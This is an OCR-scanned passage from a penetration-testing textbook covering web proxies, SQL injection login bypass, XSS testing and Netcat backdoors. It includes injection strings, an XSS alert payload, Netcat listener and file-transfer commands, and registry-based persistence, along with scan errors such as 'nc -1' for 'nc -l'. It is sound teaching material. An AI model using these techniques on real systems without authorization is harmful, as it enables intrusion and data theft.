8629FIGURE 5.8
8630
8631Using WebScarab to Spicier the Target Website.
8632
8633
8634
8635Web-Based Exploitation CHAPTER 5
8636
8637
8638
8639INTERCEPTING REQUESTS WITH WEBSCARAB
8640
8641As previously mentioned, WebScarab is a very powerful tool. One of its many
8642roles is to function as a proxy server. Recall that a proxy sits between the cli-
8643ent (browser) and the server. While the proxy is running, all the web traffic
8644flowing into and out of your browser is passed through the program. Passing
8645traffic through a local proxy provides us with an amazing ability; by running
8646WebScarab in this mode, we are able to stop, intercept, and even change the
8647data either before it arrives or after it leaves the browser. This is a subtle but
8648important point; the use of a proxy allows us to make changes to data in tran-
8649sit. The ability to manipulate or view HTTP request or response information
8650has serious security implications.
8651
8652Consider the following: some poorly coded websites rely on the use of hidden
8653fields to transmit information to and from the client. In these instances, the
8654programmer makes use of a hidden field on the form, assuming that the user
8655will not be able to access it. Although this assumption is true for a normal user,
8656anyone leveraging the power of a proxy server will have the ability to access
8657and modify the hidden field.
8658
8659The classic example of this scenario is the user who was shopping at an online
8660golf store. After browsing the selection, he decided to buy a driver for $299.
8661Being a security analyst, the astute shopper was running a proxy and noticed
8662that the website was using a hidden field to pass the value of the driver ($299)
8663to the server when the "add to cart" button was clicked. The shopper set up his
8664proxy to intercept the HTTP POST request. This means when the information
8665was sent to the server, it was stopped at the proxy. The shopper now had the
8666ability to change the value of the hidden field. After manually changing the
8667value from $299 to $1, the request was sent onto the server. The driver was
8668added to his shopping cart and the new total due was $ 1 .
8669
8670Although this scenario is not as common as it used to be, it certainly demon-
8671strates the power of using a proxy to intercept and inspect HTTP requests and
8672responses.
8673
8674To use WebScarab as an interceptor, you need to configure your browser to
8675use a proxy as discussed in the Spidering section of this chapter. Once your
8676browser is configured to use the proxy, you can start WebScarab by clicking on
8677the following: K-Start dragon — * Backtrack — * Web Application Analysis — ► Web
8678(front end) — * WebScarab lite.
8679
8680You will need to restart WebScarab to use the "lite" version. Once WebScarab
8681has finished loading, you will need to click on the "Intercepts tab." Next
8682you should put a check box in both the "Intercept requests" and "Intercept
8683responses" as shown in Figure 5.9.
8684
8685At this point you can use Firefox to browse through your target website.
8686
8687
8688
8689The Basics of Hacking and Penetration Testing
8690
8691
8692
8693err
8694
8695Pul
8696
8697OILETE
8698
8699
8700
8701duly MiMt-Tvp** irnvWrn) :
8702
8703
8704
8705fvtludf pjllii mulching:
8706
8707
8708
8709FIGURE 5.9
8710
8711Setting Up WebScarab to Intercept Requests and Responses.
8712
8713
8714
8715ALERT!
8716
8717
8718
8719Just a word of warning — you may want to leave the Intercept requests and Intercept
8720responses unchecked until you are ready to test, as nearly every page involves these
8721actions and intercepting everything before you are ready will make your browsing
8722experience painfully slow.
8723
8724
8725
8726With WebScarab set up as described, the proxy will stop nearly every transac-
8727tion and allow you to inspect or change the data. Luckily if you find yourself in
8728this situation, WebScarab has included a "Cancel ALL Intercepts" button. This
8729can be handy to keep moving forward.
8730
8731To change the values of a given field, wait for WebScarab to intercept the
8732request; then locate the variable you wish to change. At this point, you can
8733simply enter a new value in the "value" field and click the "Insert" button to
8734update the field with the new value.
8735
8736Viewing HTTP response and requests can also be useful for discovering user-
8737name and password information. Just remember, the value in many of these
8738fields will be Base64 encoded. Although these values may look as though they
8739are encrypted, you should understand that Base64 is a form of encoding not
8740encryption. Although these processes may sound similar, they are vastly differ-
8741ent. Decoding Base64 is a trivial task that can be accomplished with little effort
8742using a program or online tool.
8743
8744It should be pointed out that there are many good proxy servers available to
8745assist you with the task of data interception. Do not be afraid to explore other
8746proxy servers as well.
8747
8748CODE INJECTION ATTACKS
8749
8750Like buffer overflows in system code, injection attacks have been a serious issue
8751in the web world for many years, and like buffer overflows, there are many
8752
8753
8754
8755Web-Based Exploitation CHAPTER 5
8756
8757
8758
8759different kinds of code injection attacks. Broadly denned, this class of attacks
8760could easily fill a chapter. However, because we are focusing on the basics,
8761we will examine the most basic type of code injection: the classic SQL injec-
8762tion. We will explore the basic commands needed to run an SQL injection and
8763how it can be used to bypass basic web application authentication. Injection
8764attacks can be used for a variety of purposes including bypassing authentica-
8765tion, manipulating data, viewing sensitive data, and even executing commands
8766on the remote host.
8767
8768Most modern web applications rely on the use of interpreted programming
8769languages and backend databases to store information and generate dynami-
8770cally driven content to the user. There are many popular interpreted program-
8771ming languages in use today including PHP, Javascript, ASP, Structured Query
8772Language (SQL), Python, and countless others. An interpreted language differs
8773from a compiled language because the interpreted language generates machine
8774code just before it is executed. Compiled programming languages require the
8775programmer to compile the source code and generate an executable (.exe) file.
8776In this case, once the program is compiled, the source code cannot be changed
8777unless it is recompiled and the new executable is redistributed.
8778
8779In the case of modern web applications, like an e-commerce site, the inter-
8780preted language works by building a series of executable statements that uti-
8781lize both the original programmer's work and input from the user. Consider
8782an online shopper who wants to purchase more RAM for his computer. The
8783user navigates to his favorite online retailer and enters the term "16gb RAM" in
8784the search box. After the user clicks the search button, the web app gathers the
8785user's input ("16gb RAM") and constructs a query to search the backend data-
8786base for any rows in the product table containing "16gb RAM." Any products
8787that contain the keywords "16gb RAM" are collected from the database and
8788returned to the user's browser.
8789
8790Understanding what an interpreted language is and how it works is the key to
8791understanding injection attacks. Knowing that user input will often be used
8792to build code that is executed on the target system, injection attacks focus on
8793submitting, sending, and manipulating user-driven input. The goal of sending
8794manipulated input or queries to a target is to get the target to execute unin-
8795tended commands or return unintended information back to the attacker.
8796
8797The classic example of an injection attack is SQL injection. SQL is a program-
8798ming language that is used to interact with and manipulate data in a database.
8799Using SQL a user can read, write, modify, and delete data stored in the database
8800tables. Recall from our example above that the user supplied a search string
8801"16gb RAM" to the web application (an e-commerce website). In this case, the
8802web application generated an SQL statement based off of the user input.
8803
8804It is important that you understand there are many different flavors of SQL
8805and different vendors may use different verbs to perform the same actions.
8806Specific statements that work in Oracle may not work in MySQL or MSSQL.
8807The information contained below will provide a basic and generic framework
8808
8809
8810
8811The Basics of Hacking and Penetration Testing
8812
8813
8814
8815for interacting with most applications that use SQL, but you should strive to
8816learn the specific elements for your target.
8817
8818Consider another example. Assume that our network admin Ben Owned is
8819searching for a Christmas present for his boss. Wanting to make up for many
8820of his past mistakes, Ben decides to browse his favorite online retailer to search
8821for a new laptop. To search the site for laptops, Ben enters the keywords "lap-
8822top" (minus the quotes) into a search box. This causes the web application to
8823build an SQL query looking for any rows in the product table that include the
8824word "laptop." SQL queries are among the most common actions performed
8825by web applications as they are used to search tables and return matching
8826results. The following is an example of a simple SQL query:
8827
8828SELECT * FROM product WHERE category = 'laptop';
8829
8830In the statement above, the "SELECT" verb is used to tell SQL that you wish
8831to search and return results from a table. The "*" is used as a wildcard and
8832instructs SQL to return every column from the table when a match is found.
8833The "FROM" keyword is used to tell SQL which table to search. The "FROM"
8834verb is followed immediately by the actual name of the table ("product" in this
8835example). Finally, the "WHERE" clause is used to set up a test condition. The
8836test condition is used to restrict or specify which rows are to be returned back
8837to the user. In this case, the SELECT statement will return all the rows from the
8838product table that contain the word "laptop" in the "category" column.
8839
8840It is important to remember that in real life, most SQL statements you will
8841encounter are much more complex than this example. Oftentimes, an SQL
8842query will interact with several columns from several different tables in the
8843same query. However, armed with this basic SQL knowledge, let us examine
8844this statement a little more closely. We should be able to clearly see that in
8845our example the user created the value to the right of the "=" sign, whereas
8846the original programmer created everything to the left of the " = " sign. We
8847can combine this knowledge with a litde bit of SQL syntax to produce some
8848unexpected results. The programmer built an SQL statement that was already
8849fully constructed except for the string value to be used in the WHERE clause.
8850The application accepts whatever the user types into the "search" textbox and
8851appends that string value to the end of the already created SQL statement.
8852Lastly, a final single quote is appended onto the SQL statement to balance the
8853quotes. It looks like this when it is all done:
8854
8855SELECT * FROM product WHERE category = 'laptop'
8856
8857where SELECT * FROM product WHERE category =' is created ahead of time
8858by the programmer, while the word 1 aptop is user-supplied and the final ' is
8859appended by the application to balance quotes.
8860
8861Also notice that when the actual SQL statement was built, it included single
8862quotes around the word "laptop." SQL adds these because "category" is a string
8863datatype in the database. They must always be balanced, that is there must be
8864
8865
8866
8867Web-Based Exploitation CHAPTER 5
8868
8869
8870
8871an even number of quotes in the statement, so an SQL syntax error does not
8872occur. Failure to have both an opening and closing quote will cause the SQL
8873statement to error and fail.
8874
8875Suppose that rather than simply entering the keyword, laptop, Ben entered the
8876following into the search box:
8877
88781 aptop ' or 1 = 1 - -
8879In this case the following SQL statement would be built and executed:
8880
8881SELECT * FROM product WHERE category = 'laptop' or 1 =1--'
8882
8883By adding the extra quote, Ben would close off the string containing the user-
8884supplied word of 'laptop' and add some additional code to be executed by the
8885SQL server, namely:
8886
8887or 1 = 1- -
8888
8889The "or" statement above is an SQL condition that is used to return records
8890when either statement is true. The " — " is a programmatic comment. In most
8891SQL versions, everything that follows the " — " is simply ignored by the inter-
8892preter. The final single quote is still appended by the application, but it is
8893ignored. This is a very handy trick for bypassing additional code that could
8894interfere with your injection. In this case the new SQL statement is saying
8895"return all of the records from the product table where the category is 'laptop'
8896or 1 = 1." It should be obvious that 1 = 1 is always true. Because this is a true
8897statement, SQL will actually return ALL of the records in the product table!
8898
8899The key to understanding how to use SQL injections is to understand the sub-
8900tleties in how the statements are constructed.
8901
8902On the whole, the example above may not seem too exciting; instead of
8903returning all the rows containing the keyword laptop, we were able to return
8904the whole table. However, if we apply this type of attack to a slightly different
8905example, you may find the results a bit more sensational.
8906
8907Many web applications use SQL to perform authentication. You gain access to
8908restricted or confidential locations and material by entering a username and
8909password. As in the previous example, oftentimes this information is con-
8910structed from a combination of user-supplied input, the username and pass-
8911word, and programmer-constructed statements.
8912
8913Consider the following example. The network admin Ben Owned has created a
8914new website that is used to distribute confidential documents to the company's
8915key strategic partners. Partners are given a unique username and password to
8916log into the website and download material. After setting up his secure website,
8917Ben asks you to perform a penetration test against the site to see if you can
8918bypass his authentication.
8919
8920You should start this task by using the same technique we examined to return
8921all the data in the "products" table. Remember the "-" is a common way of
8922
8923
8924
8925The Basics of Hacking and Penetration Testing
8926
8927
8928
8929commenting out any code following the "— ". As a result, in some instances it
8930is possible to simply enter a username followed by the "— " sequence. If inter-
8931preted correctly this can cause the SQL statement to simply bypass or ignore
8932the section of code that checks for a password and give you access to the
8933specified user. However, this technique will only work if you already know a
8934username.
8935
8936If you do not know the username, you should begin by entering the following
8937into the username textbox:
8938
8939'or 1 = 1- -
8940
8941Leaving the username parameter blank and using an expression that will
8942always evaluate to true is a key way to attack a system when we are unsure of
8943the usernames required to log into a database. Not entering a username will
8944cause most databases to simply grab the first user in the database. In many
8945instances, the first user account in a database is an administrative account. You
8946can enter whatever you want for a password (for example, "syngress"), as it
8947will not even get checked by the database because it is commented out. You do
8948need to supply a password to bypass client-side authentication (or you can use
8949your intercepting proxy to delete this parameter altogether).
8950
8951SELECT * FROM users WHERE uname = ''or 1 =1-- and pwd = 'syngress'
8952
8953At this point you should either have a username or be prepared to access the
8954database with the first user listed in the database. If you have a username, we
8955need to attack the password field; here again we can enter the statement:
8956
8957'or 1 = 1- -
8958
8959Because we are using an "or" statement, regardless of what is entered before
8960the first single quote, the statement will always evaluate to true. Upon examin-
8961ing this statement, the interpreter will see that the password is true and grant
8962access to the specified user. If the username parameter is left blank, but the rest
8963of the statement is executed, you will be given access to the first user listed in
8964the database.
8965
8966In this instance, assuming we have a username, the new SQL statement would
8967look similar to the following:
8968
8969SELECT* FROM users WHERE uname = 'admin' and pwd =''or 1 =1--
8970
8971In many instances, the simple injection above will grant you full access to the
8972database as the first user listed in the "users" table.
8973
8974In all fairness, it should be pointed out that it is becoming more uncommon
8975to find SQL injection errors and bypass authentication using the techniques
8976listed above. Injection attacks are now much more difficult to locate. However,
8977this classic example still rears its head on occasion, especially with custom-
8978built apps, and it also serves as an excellent starting point for learning about
8979and discovering the more advanced injection attacks.
8980
8981
8982
8983Web-Based Exploitation CHAPTER 5
8984
8985
8986
8987CROSS-SITE SCRIPTING: BROWSERS THAT
8988TRUST SITES
8989
8990Cross-site scripting, also referred to as XSS, is the process of injecting scripts
8991into a web application. The injected script can be stored on the original web
8992page and run or processed by each browser that visits the web page. This pro-
8993cess happens as if the injected script was actually part of the original code.
8994
8995Cross-site scripting is different from many other types of attacks as XSS
8996focuses on attacking the client, not the server. Although the malicious script
8997itself is stored on the web application (server), the actual goal is to get a client
8998(browser) to execute the script and perform an action.
8999
9000As a security measure, web applications only have access to the data that
9001they write and store on a client. This means any information stored on your
9002machine from one website cannot be accessed by another website. Cross-
9003site scripting can be used to bypass this restriction. When an attacker is able
9004to embed a script into a trusted website, the victim's browser will assume all
9005the content including the malicious script is genuine and therefore should be
9006trusted. Because the script is acting on behalf of the trusted website, the mali-
9007cious script will have the ability to access potentially sensitive information
9008stored on the client including session tokens and cookies.
9009
9010It is important to point out that the end result or damage caused by a success-
9011ful XSS attack can vary widely. In some instances the effect is a mere annoyance
9012like a persistent pop-up window, whereas other more serious consequences
9013can result in the complete compromise of the target. Although many people
9014initially reject the seriousness of XSS, a skilled attacker can use the attack to
9015hijack sessions, gain access to restricted content stored by a website, execute
9016commands on the target, and even record keystrokes!
9017
9018You should understand that there are numerous cross-site scripting attack vec-
9019tors. Aside from simply entering code snippets into an input box, malicious
9020hyperlinks or scripts can also be embedded directly into websites, e-mails, and
9021even instant messages. Many e-mail clients today automatically render HTML
9022e-mail. Oftentimes, the malicious portion of a malicious URL will be obfus-
9023cated in an attempt to appear more legitimate.
9024
9025In its simplest form, conducting a cross-site scripting attack on a web applica-
9026tion that does not perform input sanitization is easy. When we are only inter-
9027ested in providing proof that the system is vulnerable, we can use some basic
9028JavaScript to test for the presence of XSS. Website input boxes are an excellent
9029place to start. Rather than entering expected information into a textbox, a pen-
9030etration tester should attempt to enter the script tag followed by a JavaScript
9031"alert" directly into the field. The classic example of this test is listed below:
9032
9033<script >alert("XSS Test") </script >
9034
9035If the above code is entered and the server is vulnerable, a JavaScript "alert"
9036pop-up window will be generated. Figure 5.10 shows an example of a typical
9037
9038
9039
9040The Basics of Hacking and Penetration Testing
9041
9042
9043
9044Username
9045
9046
9047
9048
9049Password
9050
9051
9052Submit |
9053
9054
9055
9056FIGURE 5.10
9057
9058Example of Input Boxes on a Typical Web Page.
9059
9060
9061
9062Username
9063Password
9064
9065
9066
9067Submit
9068
9069
9070
9071FIGURE 5.11
9072
9073XSS Test Code.
9074
9075
9076
9077
9078FIGURE 5.12
9079
9080XSS Success!
9081
9082web page where the user can log in by entering a username and password into
9083the textboxes provided.
9084
9085However, as previously described, rather than entering a normal username and
9086password, enter the test script. Figure 5.11 shows an example of the test XSS
9087before submitting.
9088
9089After entering our test script, we are ready to click the "Submit" button.
9090Remember if the test is successful and the web application is vulnerable to
9091cross-site scripting, a JavaScript "alert" window with the message "XSS Test"
9092should appear on the client machine. Figure 5.12 shows the result of our test,
9093providing proof that the application is vulnerable to cross-site scripting.
9094
9095Just as there are several attack vectors for launching cross-site scripting, the
9096attack itself comes in several varieties. Because we are covering the basics, we
9097will look at two examples: reflected cross-site scripting and stored cross-site
9098scripting.
9099
9100
9101
9102Web-Based Exploitation CHAPTER 5
9103
9104
9105
9106Reflected cross-site scripts occur when a malicious script is sent from the client
9107machine to a vulnerable server. The vulnerable server then bounces or reflects
9108the script back to the user. In these cases, the payload (or script) is executed
9109immediately. This process happens in a single response/request. This type of
9110cross-site scripting attack is also known as a "First Order XSS." Reflected cross-
9111site scripting attacks are nonpersistent. Thus, the malicious URL must be fed to
9112the user via e-mail, instant message, and so on, so the attack executes in their
9113browser. This has a phishing feel to it and rightfully so.
9114
9115In some instances, the malicious script can actually be saved directly on the
9116vulnerable server. When this happens, the attack is called a stored XSS. Because
9117the script is saved, it gets executed by every user who accesses the web applica-
9118tion. In the case of stored XSS attacks, the payload itself (the malicious script
9119or malformed URL) is left behind and will be executed at a later time. These
9120attacks are typically saved in a database or applet. Stored XSS does NOT need
9121the phishing aspect of reflected XSS. This helps the legitimacy of the attack.
9122
9123As mentioned earlier, cross-site scripting is a very practical attack. Even though
9124we only examined the simplest of XSS attacks, do not let this deter you from
9125learning about the true power of cross-site scripting. In order to truly master
9126this content, you will need to learn how to harness the power of XSS attacks
9127to steal sessions from your target and deliver the other payloads discussed ear-
9128lier in this section. Once you have mastered both reflected and stored cross-site
9129scripting attacks, you should begin examining and studying DOM-based XSS
9130attacks.
9131
9132HOW DO I PRACTICE THIS STEP?
9133
9134As mentioned at the beginning of this chapter, it is important that you learn to
9135master the basics of web exploitation. However, finding vulnerable websites on
9136which you are authorized to conduct these attacks can be difficult. Fortunately,
9137the fine folks at the Open Web Application Security Project (OWASP) organi-
9138zation have developed a vulnerable platform for learning and practicing web-
9139based attacks. This project, called WebGoat, is an intentionally misconfigured
9140and vulnerable web server.
9141
9142WebGoat was built using J2EE, which means it is capable of running on any
9143system that has the Java Runtime Environment installed. WebGoat includes
9144more than 30 individual lessons that provide a realistic, scenario-driven learn-
9145ing environment. Current lessons include all the attacks we described in this
9146chapter and many more. Most lessons require you to perform a certain attack
9147like using SQL injection to bypass authentication. Each lesson comes complete
9148with hints that will help you solve the puzzle. As with other scenario-driven
9149exercises, it is important to work hard and attempt to find the answer on your
9150own before using the help files.
9151
9152If you are making use of virtual machines in your hacking lab, you will need
9153to download and install WebGoat inside a virtual machine. As discussed
9154
9155
9156
9157The Basics of Hacking and Penetration Testing
9158
9159
9160
9161previously, WebGoat will run in either Linux or Windows, just be sure to install
9162Java (JRE) on your system prior to starting WebGoat.
9163
9164WebGoat can be downloaded from the official OWASP website at: http://www.
9165owasp.org/. The file you download will require 7zip or a program capable of
9166unzipping a .7z file. Unzip the file and remember the location of the uncom-
9167pressed WebGoat folder. If you are running WebGoat on Windows, you can
9168navigate to the unzipped WebGoat folder and locate the "webgoat_8080.bat"
9169file. Execute this batch file by double clicking it. A terminal window will appear;
9170you will need to leave this window open and running in order for WebGoat to
9171function properly. At this point, assuming that you are accessing WebGoat from
9172the same machine you are running the WebGoat server on, you can begin using
9173WebGoat by opening a browser and entering the URL: http://127. 0.0. 1:8080/
9174webgoat/attack.
9175
9176If everything went properly you will be presented with a log-in prompt. Both
9177the username and password are set to: guest
9178
9179As a final note, please pay attention to the warnings posted in the "readme"
9180file. Specifically you should understand that running WebGoat outside of a
9181lab environment is extremely dangerous, as your system will be vulnerable to
9182attacks. Always use caution and only run WebGoat in a properly sandboxed
9183environment.
9184
9185
9186
9187WHERE DO I GO FROM HERE?
9188
9189As has been pointed out several times, there is little doubt that this attack vec-
9190tor will continue to grow. Once you have mastered the basics we discussed in
9191this section, you should expand your knowledge by digging in and learning
9192some of the more advanced topics of web application hacking including client-
9193side attacks, session management, source code auditing, and many more. If
9194you are unsure of what else to study and want to keep up on the latest web-
9195attack happenings, keep an eye on the OWASP "top ten." The OWASP Top Ten
9196Project is an official list of the top web threats as defined by leading security
9197researchers and top experts.
9198
9199It should be pointed out that the WebSecurify tool we discussed earlier in the
9200chapter is capable of automatically testing for all threat categories listed in the
9201OWASP Top Ten Projects!
9202
9203
9204
9205ADDITIONAL RESOURCES
9206
9207
9208
9209You can find the list at http://www.owasp.org website or by searching Google for
9210"OWASP Top Ten." You should keep a close eye on this list, as it will continue to be
9211updated and changed as the trends, risks, and threats evolve.
9212
9213
9214
9215Web-Based Exploitation CHAPTER 5
9216
9217
9218
9219Since we are talking about OWASP and they have graciously provided you a
9220fantastic tool to learn about and test web application security, there are many
9221benefits of joining the OWASP organization. Once you are a member, there are
9222several different ways to get involved with the various projects and continue to
9223expand your knowledge of web security.
9224
9225Along with the great WebScarab project, you should explore other web proxies
9226as well. Both the Burp Proxy and Paros Proxy are excellent (and free) tools for
9227intercepting requests, modifying data, and spidering websites.
9228
9229Finally, there are several great tools that every good web penetration tes-
9230ter should become familiar with. One of my colleagues and close friends is a
9231very skilled web app penetration tester and he swears up and down that Burp
9232Suite is the best application testing tool available today. After reviewing many
9233web auditing tools, it is clear that Burp is indeed a great tool. A free version
9234of the Burp Suite is built into Backtrack and can be found by clicking on the
9235K-Start dragon — » Backtrack — » Web Application Analysis — » Web (front end) —>
9236Burpsuite
9237
9238If you are not using Backtrack, the free version of Burp can be downloaded
9239from the company's website at: http://portswigger.net/burp/download.html.
9240
9241SUMMARY
9242
9243Because the web is becoming more and more "executable" and because nearly
9244every target has a web presence, this chapter examined web-based exploitation.
9245The chapter began by reviewing techniques and tools for interrogating web
9246servers. The use of Nikto and Websecurify was covered for locating specific vul-
9247nerabilities in a web server. Exploring the target website by discovering direc-
9248tories and files was demonstrated through the use of a spider. A method for
9249intercepting website requests by using WebScarab was also covered. Code injec-
9250tion attacks, which constitute a serious threat to web security, were explored.
9251Specifically, we examined the basics of SQL injection attacks. The chapter con-
9252cluded with a brief discussion and example of cross-site scripting (XSS).
9253
9254
9255
9256This page intentionally left blank
9257
9258
9259
9260
9261Information in This Chapter:
9262
9263â– Netcat: The Swiss Army Knife
9264
9265â– Netcat's Cryptic Cousin: Cryptcat
9266
9267â– Netbus: A Classic
9268
9269â– Rootkits
9270
9271â– Hacker Defender: It Is Not What You Think
9272
9273â– Detecting and Defending Against Rootkits
9274
9275
9276
9277INTRODUCTION
9278
9279Maintaining access to a remote system is questionable activity and that needs
9280to be discussed and clearly explained to the client. Many companies are inter-
9281ested in having a penetration test performed but are leery of allowing the pene-
9282tration testing company to make use of backdoors. Most people are afraid that
9283
9284
9285
9286The Basics of Hacking and Penetration Testing
9287
9288
9289
9290these backdoors will be discovered and exploited by an unauthorized third
9291party. Imagine that you are the CEO of a company how well would you sleep
9292knowing that you may have an open, backdoor channel into your network?
9293Remember, the client sets both the scope and the authorization of the penetra-
9294tion test. You will need to take the time to fully cover and discuss this step
9295before proceeding.
9296
9297Still, on occasion you may be asked to conduct a penetration test that does
9298require the use of a backdoor. Whether the reason is to provide a proof of con-
9299cept, or simply to create a realistic scenario where the attacker can return to the
9300target, it is important to cover the basics in this step.
9301
9302In the simplest sense, a backdoor is a piece of software that resides on the tar-
9303get computer and allows the attacker to return (connect) to the machine at any
9304time. In most cases, the backdoor is a hidden process that runs on the target
9305machine and allows a normally unauthorized user to control the PC.
9306
9307It is also important to understand that many exploits are fleeting. They work
9308and provide access only as long as the program that was exploited remains run-
9309ning. In many cases if the target machine reboots or the exploited process is
9310stopped, the shell will be lost. As a result of this, one of the first tasks to com-
9311plete upon gaining access to a system is to migrate your shell to a more perma-
9312nent home. This is often done through the use of backdoors.
9313
9314Later in the chapter we will discuss rootkits. Rootkits are a special kind of soft-
9315ware that embed themselves deep into the operating system and perform a
9316number of tasks, including giving a hacker the ability to complete hide pro-
9317cesses and programs.
9318
9319NETCAT: THE SWISS ARMY KNIFE
9320
9321Netcat is an incredibly simple and unbelievably flexible tool that allows com-
9322munication and network traffic to flow from one machine to another. Although
9323Netcat's flexibility makes it an excellent choice for a backdoor, there are dozens
9324of other uses of this tool. Netcat can be used to transfer files between machines,
9325conduct port scans, serve as a simple instant messenger/chat, and even function
9326as a simple web server! We will cover the basics here, but you should spend
9327time practicing and playing with Netcat. You will be amazed at what this tool is
9328capable of. It is nicknamed the "swiss army knife" for a reason.
9329
9330Netcat was originally written and released by Hobbit in 1996 and supports
9331sending and receiving both TCP and UDP traffic. Netcat can function in either
9332a client or server mode. When it is in client mode, the tool can be used to
9333make a network connection to another service (including another instance of
9334Netcat). It is important to remember that Netcat can connect from any port
9335on your local machine to any port on the target machine. While Netcat is run-
9336ning in server mode, it acts as a listener where it waits to accept an incoming
9337connection.
9338
9339
9340
9341Maintaining Access with Backdoors and Rootkits CHAPTER 6
9342
9343
9344
9345Let us start with a very basic example of how we can use Netcat. In this exam-
9346ple we will set up Netcat to serve as a communication channel between two
9347machines. To set this up on the first machine, we simply need to choose a port
9348and instruct Netcat to run in listener mode. Issuing the following command in
9349a terminal will accomplish this task:
9350
9351nc -1 -p 2323
9352
9353In the command above, "nc" is used to invoke the Netcat program, whereas
9354the "-1" is used to put Netcat into a listener mode. The "-p" is used to specify
9355the port number we want Netcat to listen on. At this point Netcat is running
9356and waiting to accept an incoming connection on port 2323.
9357
9358Now that we have Netcat listening on the first machine, we can move to the
9359second machine. To make a connection to the listening machine, we issue the
9360following command:
9361
9362nc 172.16.45.132 2323
9363
9364Running this command from the second PC will force Netcat to attempt a con-
9365nection to port 2323 on the machine with an IP address of 172.16.45.132.
9366Because we have set up the first PC to act as a listener on that port, the two PCs
9367should now be able to communicate. We can test this by typing text into either
9368terminal window. Anything that we type into the terminal from either machine
9369will be displayed in the terminal window of both machines. This is because the
9370keyboard is acting as the standard input and Netcat is simply transporting the
9371data entered (keystrokes) over the connection.
9372
9373To end the "chat" and close the session, we can issue the CNTL+C key combi-
9374nation; this will terminate the Netcat connection. Figure 6.1 shows an example
9375of this type of communication between two computers.
9376
9377It is important to understand that once you kill or close the Netcat connec-
9378tion, you will need to restart the program on the target machine before
9379making another connection. Constantly needing to connect to the target
9380machine to restart Netcat is not very efficient. Fortunately, if you are using the
9381Windows version of the program, Netcat provides a way to avoid this issue.
9382In the Windows version of Netcat if we start Netcat in listener mode using a
9383"-L" (switch) rather than a "-1" the target will keep the connection open on
9384the specified port even after the client disconnects. In many ways, this makes
9385the program persistent. Of course to make it truly persistent, you would need
9386
9387
9388
9389rootfrbt :/pentcstB
9390
9391raotQbt : spent est 8
9392
9393roptibt J^pentestJI nc -1 -p 2323
9394
9395Hello, uelcone to the basics of Netcat!
9396
9397Tim iiks
9398
9399
9400
9401root&bt : "ft
9402root»bt:"»
9403
9404rootffbt:~ft tie 172 , 16 ,45 . 123 2323
9405Hello, welcome to the basics of Metcatt
9406Thanks
9407
9408
9409
9410FIGURE 6.1
9411
9412Using Netcat to Communicate between Two Computers.
9413
9414
9415
9416The Basics of Hacking and Penetration Testing
9417
9418
9419
9420to add the command to run every time the machine starts. On a Windows
9421machine, this could be accomplished by adding the Netcat program to the
9422
9423HKEY_LOCAL_MACHI NE\sof twa re\microsoft\windows\currentversion\run
9424registry hive.
9425
9426Unfortunately, in terms of making a persistent network connection, the Linux
9427version of Netcat is not quite so straightforward. In order to make the Netcat
9428connection persistent on a Linux machine, you would have to write a simple
9429bash script that forces Netcat to restart when the original connection is closed.
9430If you are interested in creating a persistent connection, there are many exam-
9431ples to be found on the Internet.
9432
9433Although the example above is an interesting use of Netcat and great for dem-
9434onstrating the flexibility and power of the tool, in reality you will probably
9435never use the "chat" feature during a penetration test. On the other hand, once
9436you have got Netcat uploaded to your target system, there are many practical
9437uses for the tool. Let us take a look at something a bit more advantageous, like
9438transferring files.
9439
9440Moving files between computers is easy when we have got the Meterpreter shell
9441running but remember, we do not want to have to exploit the target every time.
9442Rather, the goal is to exploit once and then leave a backdoor so we can return
9443at a later date. If we upload Netcat to the target, we can use the program to
9444transfer files to and from our target across a network.
9445
9446For this example, assume you want to upload a new file from your local
9447machine to the target machine. With Netcat running on the target machine, we
9448issue the following command:
9449
9450nc -1 -p 7777 > cal c . exe
9451
9452This command will force the target to listen for an incoming connection on
9453port 7777. Any input that is received will be stored into a file named "calc.exe."
9454
9455From our local machine, we need to use Netcat to make a connection to the
9456target and specify the file we want to send to the target. We accomplish this by
9457using the following command:
9458
9459nc 172.16.45.129 7777 <calc.exe
9460
9461Unfortunately, Netcat does not provide you any type of feedback letting you
9462know when the transfer has been completed. Because you will receive no indi-
9463cation when the upload is done, it is best to just wait for a few seconds and
9464then issue a CNTL+C to kill the connection. At this point, you should be able
9465to run the "Is" command on your target machine and see the newly created
9466file. Figure 6.2 shows an example of this process.
9467
9468Naturally you could set up a Netcat connection to pull files from the target
9469machine by reversing the commands above.
9470
9471Oftentimes during a penetration test, you will discover open ports that provide
9472little or no additional information. You may run across situations where both
9473
9474
9475
9476Maintaining Access with Backdoors and Rootkits CHAPTER 6
9477
9478
9479
9480
9481
9482
9483
9484
9485
9486rootVM :
9487
9488
9489"0
9490
9491
9492rootsbt vlionel
9493
9494
9495
9496
9497
9498
9499riiiitPhl â–
9500
9501
9502"n
9503
9504
9505root@bt :/liones
9506
9507
9508Is
9509
9510
9511
9512
9513miitphl :
9514
9515
9516~» nc 172. 16. •IS. 129 7777 < c«lc.exc
9517
9518
9519cmitPtit ;/linni:s
9520
9521
9522nc -
9523
9524
95251 -p 7777 > cfllc.exe
9526
9527
9528
9529
9530
9531
9532ruutabt : /hones
9533
9534
9535Is
9536
9537
9538
9539
9540rootflbt :
9541
9542
9543"« _
9544
9545
9546ca Lc .cxe
9547
9548
9549
9550
9551
9552
9553
9554
9555
9556
9557rootsbt :/llonctt
9558
9559
9560-
9561
9562
9563
9564
9565
9566
9567
9568
9569
9570FIGURE 6.2
9571
9572Using Netcat to Transfer Files.
9573
9574
9575
957617Z.16.45.1Z5 50001
9577
9578
9579
95801. Make NC connection
9581
95822. Enter text to send to target
9583> 3. Review response from target
9584
9585
9586
9587<tD0CTVFE HTML PUBLIC "-"IETrV/DTD HTML Z.e^EN
9588<litn[><]iead>
9589
9590<t!tle>501 Method Mot Ittp lenented</t it \k>^^^
9591</!iead><body> ^^^^^
9592<hl>Method Mot Iftplenented^M >j^*^
9593<p>test to / not supported^fc^^?
9594
9595<hr>
9596
9597<ftddress>Hpachc/Z . Z . 9 tUbuntu) FHF/5.Z . 6-Zulmntu4 .5 uitli Suhos i n-Patch Seruer at
9598
9599<^body><^htnl>
9600
9601rootPtat:~8 _
9602
9603
9604
9605FIGURE 6.3
9606
9607Using Netcat to Interrogate Unknown Services.
9608
9609
9610
9611Nmap and Nessus are unable to discover the service behind the port. In these
9612cases, it is often very beneficial to use Netcat to make a blind connection to the
9613port. Once you have made the connection, you begin sending information to
9614the port by typing on the keyboard. In some instances, the keyboard input will
9615elicit a response from the service. This response may be helpful in allowing you
9616to identify the service. Consider the following example:
9617
9618Assume you are conducting a penetration test on a target server. During the
